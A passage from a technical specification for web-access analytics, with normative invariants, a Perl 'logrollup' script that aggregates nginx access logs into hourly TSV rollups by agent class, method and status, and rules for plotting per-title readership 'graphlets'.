- Methods: GET, POST, PUT, HEAD, OTHER
- Outcomes: x=error, /=redir, +=other, none=ok

Validation

A compliant scatter output SHALL satisfy:

Legend is present.
Legend title equals "Legend".
Legend is inside plot bottom-right.
Legend is non-clipped.
Legend contains agent, method, and outcome keys as specified.

Determinism

No random jitter.
No data-dependent styling.
Identical inputs MUST produce identical outputs.

Validation Requirements

No duplicate logical pages after canonical folding.
HUMAN_200_304 ordering is monotonic.
All plotted points trace back to bucket TSV bins.
/<x> and /<x-dir> variants MUST fold to the same canonical resource.

Appendix B - logrollup

|title=Appendix Invariants Block B — logrollup Generator (for Appendix Front-Matter)
|author=Ralph B. Holland
|version=1.2.0
|status=normative
|binding=normative and assertable
|anchored=yes

logrollup Generator Invariants (Normative)

Scope

These invariants specify the normative behaviour of the Perl program logrollup that consumes nginx access logs and produces per-bucket TSV rollups. They are intended for inclusion at the front of the logrollup Appendix and describe the generator’s required semantics, including carrier determination for /pub/, /pub-dir/, and /pub-meta.

Temporal and Bucketing Invariants (Normative)

LG-0 — UTC discipline (anti-slop reminder)

Anything involving time is statistically polluted by sloppy programmers. The implementation MUST preserve timezone correctness by using epoch arithmetic for bucketing and by emitting bucket identifiers in Z time.

LG-1 — Deterministic file processing order

Input globs MUST be expanded and then processed in ascending mtime order (oldest → newest) to ensure deterministic accumulation in the presence of overlapping log files.

LG-2 — Pure mathematical bucketing

Time bucketing MUST be purely mathematical:

bucket_start = floor(epoch / period_seconds) * period_seconds
bucket_end = bucket_start + period_seconds

No “calendar rounding” or localtime heuristics are permitted.

Classification Invariants (Normative)

LG-3 — badbot is definitive

badbot MUST be detected ONLY by HTTP status = 308. No UA regex and no other status code may classify as badbot.

LG-4 — Wanted agent taxonomy from /etc/nginx/bots.conf

AI and bot classification MUST be derived from /etc/nginx/bots.conf using ONLY patterns that map to "0" (wanted).

Parsing sections is normative:

Between '# good bots' and '# AI bots' => BOT patterns
Between '# AI bots' and '# unwanted bots' => AI patterns
The unwanted-bots section MUST be ignored for analytics classification

Matching policy:

badbot(308) takes precedence over all.
curl/wget substring match takes precedence after badbot.
then AI patterns
then BOT patterns
else HUMAN

LG-5 — Method taxonomy is uniform

All agent categories MUST use the same method buckets:

GET, HEAD, POST, PUT, OTHER (everything else).

LG-6 — Status taxonomy is uniform

Status buckets MUST be:

ok => 200 or 304
redir => 300..399 (except 308 which is badbot)
client_err => 400..499
other => everything else / malformed

Exclusion Invariants (Normative)

LG-7 — --exclude-local excludes before bucketing

When --exclude-local is enabled:

local IP hits MUST be excluded (not counted) before any bucketing and before any aggregation.
POST+edit traffic MUST be excluded only within the defined edit window (inclusive bounds), prior to bucketing.

Local IP set is normative for exclusion:

127.0.0.1, ::1,
10.0.0.0/8,
192.168.0.0/16, and
203.217.61.13.

Output Schema Invariants (Normative)

LG-8 — Fixed TSV schema (header + rows)

The TSV output schema MUST be fixed and emitted as a header row, followed by rows.

Column set MUST include all combinations:

actors: curlwget, ai, bot, human
methods: get, head, post, put, other
status: ok, redir, client_err, other

with column names:

<actor>_<method>_<status>

and MUST additionally include, in this order after the above counters:

badbot_308
total_bytes
total_hits
server_name
path

LG-9 — Web-farm safe aggregation keys

Aggregation MUST include:

bucket_start + server_name + path

so that no cross-vhost contamination is possible.

Carrier and Canonical Path Invariants (Normative)

LG-10 — Canonical path identity is deterministic

The generator MUST normalise request path identity such that the same resource collates across:

absolute URLs (if present), query strings, MediaWiki title carriers, percent encoding policy (decode optional), and trailing slashes,

subject to the constraints below.

LG-11 — Root family derivation (never invent)

The root family MUST be derived only from the request base path (path without query):

If base matches ^/([^/]+)-dir/index.php$ then root := "/<root>" lowercased
Else if base matches ^/([^/]+)/ then root := "/<root>" lowercased

If root cannot be derived, the implementation MUST NOT invent a different root family.

LG-12 — Title extraction carriers (bound to derived root)

A title MUST be extracted only via these carriers, in precedence order:

(a) Direct title path carrier: base matches ^/<root>/([^/]+)$ => title := that segment

(b) Canonical index carrier: base matches ^/<root>-dir/index.php$ AND query has title=<v> non-empty => title := value(title)

(c) Fallback page carrier: base matches ^/<root>-dir/index.php$ AND query has page=<v> non-empty=> title := value(page)

No other carriers are permitted for title extraction.

LG-13 — Infrastructure / non-title canonicalisation

If no title is extracted, the canonical key MUST be the base path only (query discarded), with:

repeated slashes collapsed
trailing slash removed unless the path is exactly "/"

This ensures /pub-dir/load.php and /pub-dir/images/... remain infrastructure identities and do not collide with /pub/<Title>.

LG-14 — Title canonicalisation rules

After title extraction, the following canonicalisation MUST be applied:

'_' replaced by space
en-dash/em-dash (–, —) replaced by ASCII '-'
collapse whitespace runs to single spaces
trim leading/trailing whitespace

No additional title rewriting is permitted.

LG-15 — Meta-access classification for /pub-meta (precedence preserved)

Meta-access classification MUST apply only when base ends with /index.php (case-insensitive), and MUST follow this precedence:

1) if query has docid non-empty => meta_class := "docid"

2) else if query has diff non-empty => meta_class := "diff"

3) else if query has oldid non-empty => meta_class := "version"

4) else if query has action=history => meta_class := "history"

L else meta_class := "" (no meta)

LG-16 — Canonical key construction (/pub/, /pub-meta/)

If meta_class is empty: canonical_key := /<root>/<canonical_title>

If meta_class is non-empty: canonical_key := /<root>-meta/<meta_class>/<canonical_title>

For publications:

/pub/<Title> (page access)
/pub-meta/diff/<Title> (diff access)
/pub-meta/version/<Title> (oldid access)
/pub-meta/history/<Title> (history access)
/pub-meta/docid/<Title> (docid access)

LG-17 — Query stripping rule

Except for extracting title and meta_class as above, the query string MUST NOT participate in canonical identity. All other query parameters MUST be ignored for identity (i.e., dropped).

Auditability Invariants (Normative)

LG-18 — bots.conf parsing is auditable

When --verbose is enabled, the program MUST report to STDERR the wanted patterns identified as: L "good AI agent" and "good bot" so that the classification basis is externally auditable.

logrollup perl code (2026-02-22)

#!/usr/bin/env perl
use strict;
use warnings;
use IO::Uncompress::Gunzip qw(gunzip $GunzipError);
use Time::Piece;
use Getopt::Long;
use File::Path qw(make_path);
use File::Spec;
# use URI::Escape qw(uri_unescape);

# History:
# 2026-02-22 ralph   - the model placed the agent string into the mapath for some stupid reason. These models are bizarre
# 2026-02-22 ralph   - instantiated governance lens and metrics and then instrcuted the model to place unattributed metdata access in its own bucket 
# 2026-02-13 ralph   - accumulate wire size for bandwidth and rate caclulations
# 2026-02-05 ralph   - epoch was wrong because the machine stripped off Z; included invariant 0 as a reminder
# 2026-02-02 ralph   - local IP is 192.168.0.0/16 and 203.217.61.13
# 2026-01-22 chatgpt - the machine wrote this code from some invariant

#title: CM-bucket-rollup invariants
#
#invariants (normative):
#  0. Anything involving time is statistically polluted in the LLM corpus by sloppy programmers
#     * UTC must process and eppch must be used to avoid slop
#     * nginx logs thus emit Z time
#     * rollups should work in Z time as well
#     * localtime for systems engineering problems is evil
#  1. server_name is first-class; never dropped; emitted in output schema and used for optional filtering.
#  2. input globs are expanded then processed in ascending mtime order (oldest -> newest).
#  3. time bucketing is purely mathematical: bucket_start = floor(epoch/period_seconds)*period_seconds.
#  4. badbot is definitive and detected ONLY by HTTP status == 308; no UA regex for badbot.
#  5. AI and bot are derived from /etc/nginx/bots.conf:
#     - only patterns mapping to 0 are "wanted"
#     - between '# good bots' and '# AI bots' => bot
#     - between '# AI bots' and '# unwanted bots' => AI_bot
#     - unwanted-bots section ignored for analytics classification
#  6. output TSV schema is fixed (total/host/path last; totals are derivable):
#       curlwget|ai|bot|human|metadata × (get|head|post|put|other) × (ok|redir|client_err|other)
#       badbot_308
#       total_hits server_name path
#  7. Path identity is normalised so the same resource collates across:
#       absolute URLs, query strings (incl action/edit), MediaWiki title=, percent-encoding, and trailing slashes.
#  8. --exclude-local excludes (does not count) local IP hits and POST+edit hits in the defined window, before bucketing.
#  9. web-farm safe: aggregation keys include bucket_start + server_name + path; no cross-vhost contamination.
# 10. bots.conf parsing must be auditable: when --verbose, report "good AI agent" and "good bot" patterns to STDERR.
# 11. method taxonomy is uniform for all agent categories: GET, HEAD, POST, PUT, OTHER (everything else).
# 12. metadata is accumulated separately for unattributed agents in parallel to human access (which is also not attributed to agents)
#     This is the parallel of human access buckets for the Access Lifetime Graphlet projections described in Publications Access Graphs.

my $cmd = $0;

# -------- options --------
my ($EXCLUDE_LOCAL, $VERBOSE, $HELP, $OUTDIR, $PERIOD, $SERVER) = (0,0,0,".","01:00","");

GetOptions(
    "exclude-local!" => \$EXCLUDE_LOCAL,
    "verbose!"       => \$VERBOSE,
    "help!"          => \$HELP,
    "outdir=s"       => \$OUTDIR,
    "period=s"       => \$PERIOD,
    "server=s"       => \$SERVER,   # optional filter; empty means all
) or usage();
usage() if $HELP;

sub usage {
    print <<"USAGE";
Usage:
  $cmd [options] /var/log/nginx/access.log*

Options:
  --exclude-local   Exclude local IPs and POST edit traffic
  --outdir DIR      Directory to write TSV outputs
  --period HH:MM    Period size (duration), default 01:00
  --server NAME     Only count hits where server_name == NAME (web-farm filter)
  --verbose         Echo processing information + report wanted agents from bots.conf
  --help            Show this help and exit

Output:
  One TSV per time bucket, named:
    YYYY_MM_DDThh_mm-to-YYYY_MM_DDThh_mm.tsv

Columns (server/page last; totals derivable):
  (curlwget|ai|bot|human|metadata) × (get|head|post|put|other) × (ok|redir|client_err|other)
  badbot_308
  total_bytes
  total_hits
  server_name
  path
USAGE
    exit 0;
}

make_path($OUTDIR) unless -d $OUTDIR;

# -------- period math (no validation, per instruction) --------
my ($PH, $PM) = split(/:/, $PERIOD, 2);
my $PERIOD_SECONDS = ($PH * 3600) + ($PM * 60);

# -------- edit exclusion window --------
my $START_EDIT = Time::Piece->strptime("12/Dec/2025:00:00:00 +1100", "%d/%b/%Y:%H:%M:%S %z");
my $END_EDIT   = Time::Piece->strptime("01/Jan/2026:23:59:59 +1100", "%d/%b/%Y:%H:%M:%S %z");

# -------- parse bots.conf (wanted patterns only) --------
my $BOTS_CONF = "/etc/nginx/bots.conf";
my (@AI_REGEX, @BOT_REGEX);
my (@AI_RAW, @BOT_RAW);

open my $bc, "<", $BOTS_CONF or die "$cmd: cannot open $BOTS_CONF: $!";
my $mode = "";
while (<$bc>) {
    if (/^\s*#\s*good bots/i)      { $mode = "GOOD"; next; }
    if (/^\s*#\s*AI bots/i)        { $mode = "AI";   next; }
    if (/^\s*#\s*unwanted bots/i)  { $mode = "";     next; }

    next unless $mode;
    next unless /~\*(.+?)"\s+0;/;
    my $pat = $1;

    if ($mode eq "AI") {
        push @AI_RAW,  $pat;
        push @AI_REGEX, qr/$pat/i;
    } elsif ($mode eq "GOOD") {
        push @BOT_RAW,  $pat;
        push @BOT_REGEX, qr/$pat/i;
    }
}
close $bc;

if ($VERBOSE) {
    for my $p (@AI_RAW)  { print STDERR "[agents] good AI agent: ~*$p\n"; }
    for my $p (@BOT_RAW) { print STDERR "[agents] good bot: ~*$p\n"; }
}

# -------- helpers --------
sub is_local_ip {
    my ($ip) = @_;
    return 1 if $ip eq "127.0.0.1" || $ip eq "::1";
    return 1 if $ip =~ /^10\./;
    return 1 if $ip =~ /^192\.168\./;
    return 1 if $ip eq "203.217.61.13";  # my public IP address
    return 0;
}

sub agent_class {
    my ($status, $ua) = @_;
    return "badbot" if $status == 308;
    return "curlwget" if defined($ua) && $ua =~ /\b(?:curl|wget)\b/i;
    for (@AI_REGEX)  { return "ai"  if $ua =~ $_ }
    for (@BOT_REGEX) { return "bot" if $ua =~ $_ }
    return "human";
}

# Canonicalise unattributed User-Agent strings for the metadata bucket.
# Goal: stable collation across trivial whitespace variance while preserving
#       distinguishability of agent families.
sub canon_ua {
    my ($ua) = @_;
    $ua //= '';
    $ua =~ s/\t/ /g;
    $ua =~ s/\s+/ /g;
    $ua =~ s/^\s+|\s+$//g;
    $ua = '(empty)' if $ua eq '';
    # Hard cap to keep TSV rows sane (nginx UA can be unbounded).
    $ua = substr($ua, 0, 200) if length($ua) > 200;
    return "ua:$ua";
}

sub method_bucket {
    my ($m) = @_;
    return "head" if $m eq "HEAD";
    return "get"  if $m eq "GET";
    return "post" if $m eq "POST";
    return "put"  if $m eq "PUT";
    return "other";
}

sub status_bucket {
    my ($status) = @_;
    return "other" unless defined($status) && $status =~ /^\d+$/;
    return "ok"         if $status == 200 || $status == 304;
    return "redir"      if $status >= 300 && $status <= 399;  # 308 handled earlier as badbot
    return "client_err" if $status >= 400 && $status <= 499;
    return "other";
}

# Function: normalise_path
# Status: UPDATED (meta-access aware)
# Normative basis: Appendix B — logrollup Meta-Access Classification Invariants
# Backward compatibility: preserves prior behaviour for non-meta access
#
# This replaces the previous normalise_path implementation.
# Old behaviour (for diff):
#   - rewrite index.php?title=X → /<root>/X
#   - drop query entirely
#
# Behaviour:
#   - canonicalises infrastructure/non-title resources deterministically
#   - extracts titles from /<root>/<title> OR /<root>-dir/index.php?... (title/page carriers)
#   - encodes meta-access under /<root>/<root>-meta/<meta_class>/<canonical_title>
#   - drops query in all other cases

sub normalise_path {
    my ($raw_path) = @_;

    # 1) split the raw URL into base and quiery segments
    my ($base, $qs) = split(/\?/, $raw_path, 2); 

    my $path = $raw_path;
    $path =~ s/\t//g;
    $path =~ s/#.*$//;

    $qs //= '';

    # 3) Parse query string (deterministic; last-key-wins)
    my %q;
    if ($qs ne '') {
        for my $pair (split /[&;]/, $qs) {
            my ($k, $v) = split /=/, $pair, 2;
            next unless defined $k && $k ne '';
            $v //= '';
            $q{lc $k} = $v; # uri_unescape($v);
        }
    }

    # 4) Derive root family from request (never invent)
    #    Accept /<root>/<...> and /<root>-dir/index.php
    my $root;
    if ($base =~ m{^/([^/]+)-dir/index\.php$}i) {
        $root = "/" . lc($1);
    } elsif ($base =~ m{^/([^/]+)/}i) {
        $root = "/" . lc($1);
    }

    # 5) Title extraction using existing carrier rules (bound to derived root)
    my $title;

    # Direct page path: /<root>/<Title>
    if (defined $root && $base =~ m{^\Q$root\E/([^/]+)$}i) {
        $title = $1;
    }
    # Canonical index form: /<root>-dir/index.php?...title=<Title>
    elsif (defined $root && $base =~ m{^\Q$root\E-dir/index\.php$}i && exists $q{title} && $q{title} ne '') {
        $title = $q{title};
    }
    # Fallback: page=<Title>
    elsif (defined $root && $base =~ m{^\Q$root\E-dir/index\.php$}i && exists $q{page} && $q{page} ne '') {
        $title = $q{page};
    }

    # 6) If no title, canonicalise as infrastructure/non-title resource
    #    (drop query; normalise trailing slash)
    if (!defined $title) {
        my $canon = $base;
        $canon =~ s{//+}{/}g;
        $canon =~ s{/$}{} unless $canon eq "/";
        return $canon;
    }

    # 7) Canonicalise title (UNCHANGED rules)
    $title =~ tr/_/ /;
    $title =~ s/[–—]/-/g;
    $title =~ s/\s+/ /g;
    $title =~ s/^\s+|\s+$//g;

    # 8) Meta-access classification (MA-3 / MA-4, precedence preserved)
    my $meta = '';

    if ($base =~ m{/index\.php$}i) {
        if (exists $q{docid} && $q{docid} ne '') {
            $meta = 'docid';
        }
        elsif (exists $q{diff} && $q{diff} ne '') {
            $meta = 'diff';
        }
        elsif (exists $q{oldid} && $q{oldid} ne '') {
            $meta = 'version';
        }
        elsif (exists $q{action} && lc($q{action}) eq 'history') {
            $meta = 'history';
        }
        # Optional:
        # elsif (exists $q{action} && lc($q{action}) eq 'info') {
        #     $meta = 'info';
        # }
    }

    # 9) Construct canonical resource key (root-derived)
    # If root could not be derived (should be rare if title exists), fall back to "/__unknown__" is NOT allowed.
    # Instead, we return the title-only under "/" root family by using "/__unknown__".
    # If you prefer hard failure instead, tell me.
    $root //= "/__unknown__";

    if ($meta ne '') {
        return "$root-meta/$meta/$title";
    }
    return "$root/$title";
}

# Identify meta-access resources after normalisation.
# NOTE: This is a *classification helper* only. It must not change non-meta
#       canonicalisation behaviour.
sub is_meta_npath {
    my ($npath) = @_;
    return 0 unless defined $npath;
    return ($npath =~ m{^/[^/]+-meta/}i) ? 1 : 0;
}


sub fmt_ts {
    my ($epoch) = @_;
    my $tp = gmtime($epoch);
    return sprintf("%04d_%02d_%02dT%02d_%02dZ",
        $tp->year, $tp->mon, $tp->mday, $tp->hour, $tp->min);
}

# -------- log regex (captures server_name as final quoted field) --------
my $LOG_RE = qr{
    ^(\S+)\s+\S+\s+\S+\s+\[([^\]]+)\]\s+
    "(GET|POST|HEAD|[A-Z]+)\s+(\S+)[^"]*"\s+
    (\d+)\s+(\d+).*?"[^"]*"\s+"([^"]*)"\s+"([^"]+)"
    (?:\s+(\S+))?\s*$
}x;

# -------- collect files (glob, then mtime ascending) --------
@ARGV or usage();
my @files;
for my $a (@ARGV) { push @files, glob($a) }
@files = sort { (stat($a))[9] <=> (stat($b))[9] } @files;

# -------- bucketed stats --------
# %BUCKETS{bucket_start}{end} = bucket_end
# %BUCKETS{bucket_start}{stats}{server}{page}{metric} = count
my %BUCKETS;

for my $file (@files) {
    print STDERR "$cmd: processing $file\n" if $VERBOSE;

    my $fh;
    if ($file =~ /\.gz$/) {
        $fh = IO::Uncompress::Gunzip->new($file)
            or die "$cmd: gunzip $file: $GunzipError";
    } else {
        open($fh, "<", $file) or die "$cmd: open $file: $!";
    }

    while (<$fh>) {
        next unless /$LOG_RE/;
        my ($ip,$ts,$method,$path,$status,$bytes_sent,$ua,$server_name,$cc) = ($1,$2,$3,$4,$5,$6,$7,$8,$9);
        $bytes_sent ||= 0;

        next if ($SERVER ne "" && $server_name ne $SERVER);

        my $tp = Time::Piece->strptime($ts, "%d/%b/%Y:%H:%M:%S %z");
        my $epoch = $tp->epoch;

        if ($EXCLUDE_LOCAL) {
            next if is_local_ip($ip);
            if ($method eq "POST" && $path =~ /edit/i) {
                next if $tp >= $START_EDIT && $tp <= $END_EDIT;
            }
        }

        my $bucket_start = int($epoch / $PERIOD_SECONDS) * $PERIOD_SECONDS;
        my $bucket_end   = $bucket_start + $PERIOD_SECONDS;

        my $npath  = normalise_path($path);
        my $aclass = agent_class($status, $ua);

        # --- Metadata bucket rule (normative):
        # Only *unattributed* agents (aclass == human) performing meta-access
        # are counted under the metadata actor. All attributed agents (ai/bot/
        # curlwget/badbot) remain in their existing buckets even when accessing
        # metadata resources.
        if ($aclass eq 'human' && is_meta_npath($npath)) {
            $aclass = 'metadata';
            # $npath  = canon_ua($ua);
        }

        my $metric;
        if ($aclass eq "badbot") {
            $metric = "badbot_308";
        } else {
            my $mb = method_bucket($method);
            my $sb = status_bucket($status);
            $metric = join("_", $aclass, $mb, $sb);
        }

        $BUCKETS{$bucket_start}{end} = $bucket_end;
        $BUCKETS{$bucket_start}{stats}{$server_name}{$npath}{$metric}++;
        $BUCKETS{$bucket_start}{stats}{$server_name}{$npath}{total_hits}++;
        $BUCKETS{$bucket_start}{stats}{$server_name}{$npath}{total_bytes} += $bytes_sent;
    }
    close $fh;
}

# -------- write outputs --------
# NOTE: metadata is a first-class actor bucket (unattributed meta-access only).
my @ACTORS  = qw(curlwget ai bot human metadata);
my @METHODS = qw(get head post put other);
my @SB      = qw(ok redir client_err other);

my @COLS;
for my $a (@ACTORS) {
    for my $m (@METHODS) {
        for my $s (@SB) {
            push @COLS, join("_", $a, $m, $s);
        }
    }
}
push @COLS, "badbot_308";
push @COLS, "total_bytes";
push @COLS, "total_hits";
push @COLS, "server_name";
push @COLS, "path";

for my $bstart (sort { $a <=> $b } keys %BUCKETS) {
    my $bend = $BUCKETS{$bstart}{end};
    my $out = File::Spec->catfile(
        $OUTDIR,
        fmt_ts($bstart) . "-to-" . fmt_ts($bend) . ".tsv"
    );

    print STDERR "$cmd: writing $out\n" if $VERBOSE;

    open my $outf, ">", $out or die "$cmd: write $out: $!";
    print $outf join("\t", @COLS), "\n";

    my $stats = $BUCKETS{$bstart}{stats};

    for my $srv (sort keys %$stats) {
        for my $p (sort {
                # sort by total_hits (highest hits first) 
                my $sa = 0; my $sb = 0;
                ($stats->{$srv}{$b}{total_hits} // 0)
                <=>
                ($stats->{$srv}{$a}{total_hits} // 0) 
            } keys %{ $stats->{$srv} }
        ) {
            my @vals;

            # emit counters
            my $total = 0;
            for my $c (@COLS) {
                if ($c eq 'total_bytes') {
                        my $tb = $stats->{$srv}{$p}{total_bytes} // 0;
                        push @vals, $tb;
                        next;
                }
                if ($c eq 'total_hits') {
                        my $th = $stats->{$srv}{$p}{total_hits} // 0;
                        push @vals, $th;
                        next;
                }
                if ($c eq 'server_name') {
                    push @vals, $srv;
                    next;
                }
                if ($c eq 'path') {
                    push @vals, $p;
                    next;
                }

                my $v = $stats->{$srv}{$p}{$c} // 0;
                $total += $v;
                push @vals, $v;
            }

            print $outf join("\t", @vals), "\n";
        }
    }
    close $outf;
}

Appendix C - Access Lifecyle Graphlets Projection Invariants

Purpose

Define a deterministic projection from rollup TSV buckets (default hourly) into a publication-centred lifecycle “graphlets” image:

X-axis: integer days relative to publication (UTC / Zulu)
Y-axis: corpus titles ordered by publication datetime ascending (earliest first), rendered top-to-bottom in that order
For each title row:
- Human page readership signal rendered as a filled envelope above the baseline (blue)
- Meta inspection signal rendered as a filled envelope below the baseline (orange, inverted)
Labels include: "<title> (<publication_datetime_utc>) (h:<human_total>, m:<meta_total>)"

This projection is intended to show qualitative lifecycle shape per title (lead-in, peak, decay) and comparative ordering by publication date. Magnitude comparison across titles MAY be shown, but MUST obey the scaling invariants declared herein.

Authority and Governance

These invariants are normative.
The assisting system MUST follow them exactly.
The projection MUST be reproducible from declared inputs alone.
The assisting system MUST NOT infer publication dates, title membership, or additional titles beyond the manifest.
Visual encoding is a governed semantic property; “pretty” optimisations that change semantics are prohibited.

Authoritative Inputs

Input A: ROLLUPS — a directory or tar archive of hourly TSV bucket files produced by logrollup (Appendix B).
Input B: MANIFEST — corpus/manifest.tsv from corpus bundle (corpus.tgz), containing at minimum:
- Title (authoritative MediaWiki title)
- Publication datetime in UTC (Zulu) for published titles
Input C: Projection parameters (explicitly declared in run metadata):
- Publication root path (default "/pub")
- Meta root encoding (default "/pub-meta" or "<root>-meta" family; see Appendix B)
- Human amplification factor (H_AMP) for display (default 1; may be >1 for diagnostic visibility)
- Lead-window minimum (LEAD_MIN_DAYS) (default 10 days)
- MA window size (MA_N_DAYS) (default 7)
- ROW_MAX (maximum envelope half-height in row units; default 0.42)
- MARGIN (row separation safety margin in row units; default 0.08)
- X major tick step (days) default 10
- X minor tick step (days) default 5

Output Artefact

A single image containing:

A set of Y-axis rows, one per eligible manifest title, ordered by publication datetime ascending (earliest at top).
For each row, a baseline line (category baseline graticle) at y=0 for that title row.
Two filled envelopes per title row:
1. Human page GET_ok signal above baseline (blue, filled)
2. Meta GET-total signal below baseline (orange, filled, inverted)
A vertical reference line at x=0 representing the publication datetime.
A legend describing the two envelopes and the human amplification factor if H_AMP != 1.
X-axis labelled in days relative to publication (UTC / Zulu), with deterministic major and minor ticks and major graticles

LG-0: Projection Semantics

This appendix is governed by the General Graph Projection Invariants:

GP-0: Mathematical Direction Semantics
GP-0a: Tooling Override Prohibition, and:
- LG-0a: Bell Envelope extensions:
  - polarity (human ALWAYS Y+, meta ALWAYS Y−)
  - Colour assignment (blue = human, orange = meta; no palette substitution)

No local redefinition or relaxation is permitted.

Time and Calendar Semantics (UTC / Zulu Only)

LG-1: UTC is authoritative for all temporal values

Rollup filenames and their bucket_start times SHALL be treated as UTC/Zulu.
Manifest publication datetimes SHALL be treated as UTC/Zulu.
No local timezone conversion is permitted.
Any timezone offsets present in datetimes MUST be normalised to UTC.

LG-2: Bucket start time extraction

Each rollup TSV represents a single time bucket.
Bucket start time SHALL be derived from the rollup filename.
If the filename encodes UTC using a "Z" indicator, that is authoritative.
The bucket_start timestamp SHALL be stored internally as an absolute UTC datetime.

Title Domain and Eligibility

LG-5: Eligible title set is derived exclusively from MANIFEST

Only titles present in MANIFEST are eligible for inclusion.
No heuristic discovery of titles from rollups is permitted.

LG-6: Exclude unpublished / invalid-date titles

Any manifest title whose publication datetime is invalid, missing, or flagged as an error date SHALL be excluded from this projection.
No attempt may be made to “infer” publication from traffic patterns.

LG-7: Title identity and normalisation

Titles extracted from rollups SHALL be normalised using the same governed rules as the corpus projection normatives:

URL percent-decoding MUST occur before other steps.
"_" MUST be converted to space.
UTF-8 dashes (–, —) MUST be converted to ASCII hyphen (-).
Whitespace runs MUST be collapsed to a single space and trimmed.
After normalisation, the title key MUST match a manifest title key exactly (or resolve via an explicit alias map that maps aliases → manifest keys).
Fuzzy matching, punctuation stripping, or approximate matching is prohibited.

Rollup Parsing and Metric Definitions

LG-8: Rollups are the sole traffic source

The projection SHALL be computed from rollup TSV buckets only.
Raw nginx logs MUST NOT be used.

LG-9: Required TSV schema properties

Each TSV row includes:
- server_name
- path (canonicalised by logrollup)
- numeric bins: <actor>_<method>_<outcome> counts
Column presence MAY vary, but:
- human_get_ok MUST be supported for the human page readership signal.
- metadata_get_ok MUST be supported for the metadata inspection signal.

LG-10: Page vs Meta path separation (MANDATORY)

Page access and meta access are disjoint and MUST NOT be merged.
Page paths are those whose canonical path begins with:
- "<PUB_ROOT>/" (default "/pub/") AND does not include "-meta/" and does not include "/pub-meta/".
Meta paths are those whose canonical path contains:
- "-meta/" or "/pub-meta/" (or the configured meta namespace produced by logrollup).
The assisting system MUST NOT treat meta paths as page hits.

LG-10a (Actor-class binding)

Path classification (page vs meta namespace) is independent of actor classification.

Metadata signal requires BOTH:

meta path classification (LG-10), and
actor bucket == metadata_*.

The presence of "-meta/" in a path SHALL NOT imply aggregation across all actors.

LG-11: Human page signal definition

For each rollup row R:

HUMAN_PAGE_SIGNAL[R] = human_get_ok
Only rows classified as page paths (LG-10) contribute.

LG-12: Metadata signal definition (metadata actor only)

For each rollup row R classified as meta path (LG-10):

META_SIGNAL[R] = metadata_get_ok

Where:

"metadata_get_ok" refers specifically to the metadata actor bucket produced by logrollup.
The metadata actor bucket is the anonymous, non-authenticated metadata inspection channel defined by logrollup classification.
No other actor buckets (human, bot, ai, curlwget, etc.) SHALL contribute.
The projection MUST NOT sum across all "*_get_*" columns.

LG-13: Title extraction from canonical path

For page paths:
- TITLE_RAW = substring after "<PUB_ROOT>/"
For meta paths:
- TITLE_RAW = the final path component after the last "/"
TITLE_RAW MUST then be normalised per LG-7 and resolved to a manifest key.

LG-14: Virtual host handling

server_name is first-class and MUST be preserved.
If a server filter is applied, it MUST be explicit in run metadata.
If no server filter is applied, aggregation across vhosts is permitted only when the curator explicitly supplies rollups that already represent the desired scope.
The projection MUST NOT silently combine or drop vhosts without explicit configuration.

LG-17b labels

C2-LABEL-0 (Totals for label content)

H_TOTAL[T] = Σ H[bucket,T] over all buckets in plotted window (pre-MA, pre-log, pre-H_AMP)

M_TOTAL[T] = Σ M[bucket,T] over all buckets in plotted window (pre-MA, pre-log)

Smoothing

Relative Day Axis

LG-20: X-axis windowing

The X-axis minimum MUST include at least LEAD_MIN_DAYS days of lead-in:
- X_MIN <= -LEAD_MIN_DAYS (default LEAD_MIN_DAYS = 10)
The X-axis maximum MUST cover the observed tail in the rollups (latest REL_DAY with non-zero signal) plus a small deterministic padding (e.g., +5 days).
The projection MUST NOT hard-code an arbitrary large negative lead window unless required by observed signal or curator-specified override.

Ordering

LG-21: Row ordering is publication datetime ascending

Titles MUST be ordered by PUB_DT ascending (earliest first).
The rendered visual order MUST match human reading order:
- earliest title MUST appear at the top row,
- latest title MUST appear at the bottom row.
If the plotting library’s axis direction would invert this, the implementation MUST explicitly map indices to preserve top-to-bottom semantic order.

LG-22: Stable tie-breaking

If two titles share identical PUB_DT, the tie MUST be broken deterministically:
- primary: title lexicographic ascending (UTF-8 codepoint order)
No other ordering is permitted.

Graphlets Rendering Semantics

LG-23: Baseline per title row (category baseline graticle)

Each title row SHALL have a baseline y=0 line for that row.
The baseline line MUST be rendered (thin) across the full x-window.
Human envelope SHALL be rendered above that baseline.
Meta envelope SHALL be rendered below that baseline (inverted).

LG-24: Envelope encoding (mandatory)

Human envelope:
- colour = blue
- fill = solid (opaque)
- direction = upward (positive y relative to baseline)
- data = MA_HUMAN[D,T] after applying human amplification (LG-26)
Meta envelope:
- colour = orange
- fill = solid (opaque)
- direction = downward (negative y relative to baseline)
- data = MA_META[D,T] (no implicit amplification unless explicitly declared)

LG-25: Fill opacity

Fill opacity MUST be fully opaque (alpha = 1.0).
Transparent or washed-out fills are prohibited.

LG-26: Human amplification (display-only)

A human amplification factor H_AMP MAY be applied to MA_HUMAN for display.
H_AMP MUST be explicitly declared in the legend text when H_AMP != 1.
Amplification MUST NOT alter any aggregation, smoothing, ordering, or totals; it is strictly a display transform.

LG-27: Scaling modes (must be declared; no silent switching)

The projection MUST use exactly one of the following scaling modes, explicitly declared in run metadata:

Mode A: Global scale (comparative magnitude preserved across titles)

A single scale factor is derived from the maximum of the displayed signals over all titles and days:
- MAX_ALL = max over T,D of max( H_AMP*MA_HUMAN[D,T], MA_META[D,T] )
Both envelopes use the same scale factor.

Mode B: Per-title scale (envelope shape emphasised; magnitudes not comparable across titles)

For each title T, a local scale factor is derived:
- MAX_T = max over D of max( H_AMP*MA_HUMAN[D,T], MA_META[D,T] )
Both envelopes for T share the same per-title scale factor.

If Mode B is used, the projection MUST NOT imply cross-title magnitude comparability.

LG-28: Zero-signal masking (recommended; deterministic)

To avoid long flat “rails”, for each title/bucket point:
- If (H_AMP*MA_HUMAN[bucket,T] == 0) AND (MA_META[bucket,T] == 0), the projection SHOULD omit rendering for that day point (no fill, no outline).
If implemented, this behaviour MUST be declared in run metadata.

LG-29: Non-overlap constraint (mandatory)

Row vertical spacing MUST be sufficient to prevent envelopes from touching adjacent rows.
Let ROW_SPACING be the distance between adjacent row baselines.
Let ROW_MAX be the maximum vertical excursion used for envelopes (above and below), expressed in row units.
The invariant MUST hold:
- ROW_MAX <= (ROW_SPACING / 2) - MARGIN
MARGIN is a fixed deterministic safety margin (default 0.08 in row units).
If the projection cannot satisfy this constraint for the chosen scaling mode and amplification, it MUST fail explicitly rather than silently compressing or overlapping.

LG-30: Legend placement

